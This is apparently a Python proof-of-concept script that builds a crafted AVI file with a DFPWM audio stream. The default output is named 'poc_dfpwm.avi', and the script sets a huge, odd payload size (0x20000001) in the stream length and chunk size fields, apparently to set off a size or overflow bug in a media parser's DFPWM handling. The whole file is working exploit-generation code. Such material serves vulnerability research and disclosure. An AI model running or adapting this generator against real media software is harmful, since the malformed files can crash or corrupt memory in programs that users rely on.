#!/usr/bin/env python3
import os
import struct
import sys


# 16-byte SubFormat GUID appended after the WAVEFORMATEXTENSIBLE fields in
# wav_format_extensible(). The hex string is the raw on-disk byte sequence
# (no Windows GUID field byte-swapping is applied). Presumably this matches
# the DFPWM entry in the target parser's WAV GUID table -- confirm.
DFPWM_GUID = bytes.fromhex("3AC1FA38811D4361A40DCE53CA607CD1")


def chunk(tag, payload):
    """Serialize one RIFF chunk: 4-byte tag, little-endian u32 size, data, pad.

    The size field counts only ``payload``. When the payload length is odd,
    a single zero pad byte is appended (and not counted) so that the next
    chunk starts on an even offset.
    """
    size = len(payload)
    header = tag + struct.pack("<I", size)
    pad = b"\x00" * (size % 2)
    return b"".join((header, payload, pad))


def list_chunk(kind, payload):
    """Wrap ``payload`` in a RIFF ``LIST`` chunk with list type ``kind``.

    The size field covers ``kind`` plus ``payload``. A trailing zero pad byte
    (not counted in the size) is added when that total is odd.
    """
    body = b"".join((kind, payload))
    trailer = b"\x00" if len(body) % 2 else b""
    return b"".join((b"LIST", struct.pack("<I", len(body)), body, trailer))


def riff_file(kind, payload):
    """Return a complete RIFF image: ``RIFF``, u32 size, form type, payload.

    The size field counts ``kind`` plus ``payload``. Unlike chunk() and
    list_chunk(), no pad byte is appended for an odd total.
    """
    form = kind + payload
    size_field = struct.pack("<I", len(form))
    return b"".join([b"RIFF", size_field, form])


def wav_format_extensible():
    """Build the ``strf`` payload: a 40-byte WAVEFORMATEXTENSIBLE for mono DFPWM.

    Layout (little-endian, no alignment padding): the 18-byte WAVEFORMATEX
    (format tag 0xFFFE, 1 channel, 48000 Hz, 6000 bytes/s, block align 1,
    1 bit per sample, cbSize 22), then the 22-byte extension (valid bits per
    sample, channel mask, 16-byte SubFormat GUID).
    """
    rate = 48_000
    bits = 1
    fields = (
        0xFFFE,             # wFormatTag: WAVE_FORMAT_EXTENSIBLE
        1,                  # nChannels
        rate,               # nSamplesPerSec
        rate * bits // 8,   # nAvgBytesPerSec (6000)
        1,                  # nBlockAlign
        bits,               # wBitsPerSample
        22,                 # cbSize: 2 + 4 + 16 extension bytes follow
        bits,               # Samples.wValidBitsPerSample
        4,                  # dwChannelMask: SPEAKER_FRONT_CENTER
    )
    return struct.pack("<HHIIHHHHI", *fields) + DFPWM_GUID


def make_header(payload_size):
    """Return every byte of the AVI file that precedes the ``00wb`` chunk header.

    That is the ``RIFF``/``AVI `` header, the ``hdrl`` LIST (``avih`` plus one
    audio ``strl``), and the 12-byte ``movi`` LIST header. The RIFF and movi
    size fields assume the movi list holds exactly one chunk: an 8-byte
    chunk header, ``payload_size`` data bytes, and a pad byte when
    ``payload_size`` is odd. That is what main() writes after this header.

    Raises:
        struct.error: if ``payload_size`` (or a size derived from it) does
            not fit an unsigned 32-bit field.
    """
    # MainAVIHeader: ten DWORD fields followed by dwReserved[4].
    avih = struct.pack(
        "<14I",
        1_000_000,      # dwMicroSecPerFrame
        payload_size,   # dwMaxBytesPerSec
        0,              # dwPaddingGranularity
        0x10,           # dwFlags: AVIF_HASINDEX (this script writes no idx1)
        1,              # dwTotalFrames
        0,              # dwInitialFrames
        1,              # dwStreams
        0,              # dwSuggestedBufferSize
        0, 0,           # dwWidth, dwHeight
        0, 0, 0, 0,     # dwReserved[4]
    )

    # AVIStreamHeader without the trailing rcFrame rectangle (48 bytes).
    strh = struct.pack(
        "<4s4sI2H8I",
        b"auds",        # fccType
        b"\x00" * 4,    # fccHandler
        0,              # dwFlags
        0, 0,           # wPriority, wLanguage
        0,              # dwInitialFrames
        1,              # dwScale
        48_000,         # dwRate
        0,              # dwStart
        payload_size,   # dwLength
        0,              # dwSuggestedBufferSize
        0xFFFFFFFF,     # dwQuality
        1,              # dwSampleSize
    )

    strl = list_chunk(
        b"strl",
        chunk(b"strh", strh) + chunk(b"strf", wav_format_extensible()),
    )
    hdrl = list_chunk(b"hdrl", chunk(b"avih", avih) + strl)

    # The media data is streamed by the caller, so only the enclosing LIST
    # and RIFF headers are built here, sized for one chunk header + data + pad.
    pad = payload_size & 1
    movi_size = len(b"movi") + 8 + payload_size + pad
    movi_header = b"LIST" + struct.pack("<I", movi_size) + b"movi"
    riff_size = len(b"AVI ") + len(hdrl) + 8 + movi_size
    return b"".join(
        (b"RIFF", struct.pack("<I", riff_size), b"AVI ", hdrl, movi_header)
    )


def main():
    """Write the crafted DFPWM-in-AVI file.

    Command line: ``[OUTPUT] [PAYLOAD_SIZE]``. OUTPUT defaults to
    ``poc_dfpwm.avi``. PAYLOAD_SIZE is parsed with ``int(..., 0)``, so
    ``0x``/``0o``/``0b`` prefixes are accepted, and defaults to 0x20000001.
    The file consists of make_header()'s bytes, one ``00wb`` (stream 0 audio)
    chunk holding PAYLOAD_SIZE zero bytes, and a pad byte when the size is odd.

    Exits with an error message (and without creating OUTPUT) when
    PAYLOAD_SIZE is not an integer or does not fit the 32-bit size fields.
    """
    output = sys.argv[1] if len(sys.argv) > 1 else "poc_dfpwm.avi"
    if len(sys.argv) > 2:
        try:
            payload_size = int(sys.argv[2], 0)
        except ValueError:
            sys.exit(f"invalid payload size: {sys.argv[2]!r}")
    else:
        payload_size = 0x20000001

    # Build every size-dependent field before touching the filesystem.
    # struct.pack raises struct.error for values that do not fit an unsigned
    # 32-bit field (negative, or large enough to overflow the RIFF size).
    # Failing here means no empty output file is left behind.
    try:
        header = make_header(payload_size)
        chunk_header = b"00wb" + struct.pack("<I", payload_size)
    except struct.error as err:
        sys.exit(
            f"payload size {payload_size:#x} does not fit the 32-bit "
            f"AVI size fields ({err})"
        )

    block_size = 1024 * 1024
    zeros = b"\x00" * block_size
    with open(output, "wb") as f:
        f.write(header)
        f.write(chunk_header)

        # Stream the zero payload in 1 MiB writes instead of building it in memory.
        remaining = payload_size
        while remaining > 0:
            n = min(remaining, block_size)
            f.write(zeros[:n])
            remaining -= n
        if payload_size & 1:
            # RIFF chunk data is word-aligned. The pad byte is not counted
            # in the chunk's size field.
            f.write(b"\x00")

    print(f"wrote {output} ({os.path.getsize(output)} bytes)")


# Generate the file only when run as a script, not on import.
if __name__ == "__main__":
    main()
